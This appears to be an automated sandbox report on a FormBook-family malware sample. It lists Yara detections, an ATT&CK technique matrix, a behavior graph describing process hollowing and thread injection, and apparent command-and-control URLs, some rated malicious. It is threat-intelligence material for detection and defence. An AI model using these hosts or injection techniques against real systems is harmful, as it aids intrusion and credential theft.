          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception712
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory231
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)712
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rundll32          		DCSync112
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562156 Sample: H4vBtZsi8xAKaMm.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 7 other signatures 2->53 10 H4vBtZsi8xAKaMm.exe 3 2->10         started        process3 file4 33 C:\Users\user\...\H4vBtZsi8xAKaMm.exe.log, ASCII 10->33 dropped 63 Writes to foreign memory regions 10->63 65 Injects a PE file into a foreign processes 10->65 14 MSBuild.exe 10->14         started        signatures5 process6 signatures7 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 2 other signatures 14->73 17 explorer.exe 14->17 injected process8 signatures9 45 System process connects to network (likely due to code injection or exploit) 17->45 20 rundll32.exe 17->20         started        process10 signatures11 55 Modifies the context of a thread in another process (thread injection) 20->55 57 Maps a DLL or memory area into another process 20->57 59 Tries to detect virtualization through RDTSC time measurements 20->59 23 explorer.exe 3 149 20->23         started        27 explorer.exe 2 153 20->27         started        29 cmd.exe 1 20->29         started        process12 dnsIp13 35 bettingweb365.com 92.222.235.170, 49887, 80 OVHFR France 23->35 37 marymarinho.com 192.0.78.24, 49885, 80 AUTOMATTICUS United States 23->37 43 4 other IPs or domains 23->43 61 System process connects to network (likely due to code injection or exploit) 23->61 39 www.vzn2aai2qj.icu 27->39 41 www.deutscheno1.com 27->41 31 conhost.exe 29->31         started        signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          H4vBtZsi8xAKaMm.exe65%VirustotalBrowse
          H4vBtZsi8xAKaMm.exe47%MetadefenderBrowse
          H4vBtZsi8xAKaMm.exe86%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          H4vBtZsi8xAKaMm.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          14.0.MSBuild.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.0.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.0.MSBuild.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.vinewineltd.com0%Avira URL Cloudsafe
          http://www.hornnbach.comReferer:0%Avira URL Cloudsafe
          http://www.verifyaxcx.com/u1p5/www.agengrosirfashion.com0%Avira URL Cloudsafe
          http://www.freeclothesonline.com/u1p5/1%VirustotalBrowse
          http://www.freeclothesonline.com/u1p5/100%Avira URL Cloudmalware
          http://www.piertrafesa.com/u1p5/www.vinewineltd.com0%Avira URL Cloudsafe
          http://www.freeclothesonline.com/u1p5/www.apeutah.com100%Avira URL Cloudmalware
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.rhoads-music.comReferer:0%Avira URL Cloudsafe
          http://www.kailibianminwang.comReferer:0%Avira URL Cloudsafe
          http://www.pbcgotv.com/u1p5/100%Avira URL Cloudmalware
          http://www.piertrafesa.com0%Avira URL Cloudsafe
          http://www.yannickrast.com/u1p5/www.rhoads-music.com0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.rhoads-music.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.apeutah.com/u1p5/www.jovam.xyz100%Avira URL Cloudmalware
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD0%Avira URL Cloudsafe
          http://www.yannickrast.com/u1p5/0%Avira URL Cloudsafe
          http://www.pbcgotv.com/u1p5/www.kailibianminwang.com100%Avira URL Cloudmalware
          http://www.verifyaxcx.comReferer:0%Avira URL Cloudsafe
          http://www.apeutah.com0%Avira URL Cloudsafe
          http://www.dasmonica.comReferer:0%Avira URL Cloudsafe
          http://www.hokabrazil.com/u1p5/www.hornnbach.com100%Avira URL Cloudphishing
